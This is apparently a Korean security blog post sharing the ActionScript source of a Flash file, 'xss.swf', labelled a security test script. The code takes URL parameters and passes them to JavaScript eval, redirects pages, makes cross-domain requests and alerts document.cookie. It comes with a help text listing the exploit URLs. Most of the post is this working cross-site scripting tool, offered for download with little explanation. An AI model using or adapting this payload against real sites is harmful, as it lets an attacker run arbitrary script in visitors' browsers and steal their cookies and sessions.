본문 바로가기

30./31. Web

Actionscript XSS using flash

Actionscript XSS using Flash


Flash의 Action Script를 이용한 XSS


XSS.zip


Source Code



/*

modify by. oneandonlyme.kain@gmail.com

2014/04/29

xss - flash security test script.

ref: fly_flash

*/


import flash.net.*;

import flash.events.SecurityErrorEvent;


var param:Object = root.loaderInfo.parameters;

var action:String = param["a"];

var cmd:String = param["c"];


function attack(action)

{

switch (action)

{

case "l" :// location URL

navigateToURL(new URLRequest(cmd),"_self");

break;

case "o" :// open URL

navigateToURL(new URLRequest(cmd),"_blank");

break;

case "g" :// GET

var loader:URLLoader = new URLLoader(new URLRequest(cmd));

loader.addEventListener(Event.COMPLETE,get_complete);

loader.addEventListener(SecurityErrorEvent.SECURITY_ERROR,get_sec_error);

break;

case "e" :// execute JS

flash.external.ExternalInterface.call("eval", cmd);

break;

case "a" :// execute JS

cmd = 'alert(document.cookie)';

flash.external.ExternalInterface.call("eval", cmd);

break;

case "x" :// execute JS

cmd = 'alert("XSS TEST")';

flash.external.ExternalInterface.call("eval", cmd);

break;

default :

var help:String = 'a(action) - c(cmd)\n';

help +=  '-----------------\n';

help +=  '1. location to url: xss.swf?a=l&c=http://www.google.com/\n';

help +=  '2. open url to new window: xss.swf?a=o&c=http://www.google.com/\n';

help +=  '3. http request to url: xss.swf?a=g&c=http://www.google.com/\n';

help +=  '4. eval js codz: xss.swf?a=e&c=alert(document.domain)\n';

help +=  '5. js code alert(document.cookie): xss.swf?a=a\n';

help +=  '6. XSS TEST: xss.swf?a=x\n';

help +=  '-----------------\n';

help +=  'by oneandonlyme.kain@gmail.com';

flash.external.ExternalInterface.call("alert", help);

break;

}

stop();

}


function get_complete(event:Event)

{

flash.external.ExternalInterface.call("alert", 'corss domain request ok.');

// __flash__toXML(alert("")) may be error.;

//var d:String = String(event.target.data);

//flash.external.ExternalInterface.call("alert", d);

}

function get_sec_error(event:SecurityErrorEvent)

{

flash.external.ExternalInterface.call("alert", '[security error:]\n/crossdomain.xml\ncross domain request is not allowed.');

}


attack(action);








'30. > 31. Web' 카테고리의 다른 글

Miss-Configuration  (0) 2014.06.21
Inclusion Attacks  (0) 2014.06.21
URL 한글 인코딩, 디코딩  (0) 2014.04.19
OpenSSL HeartBleed 취약점  (0) 2014.04.19
The Hacker Firefox  (0) 2014.04.17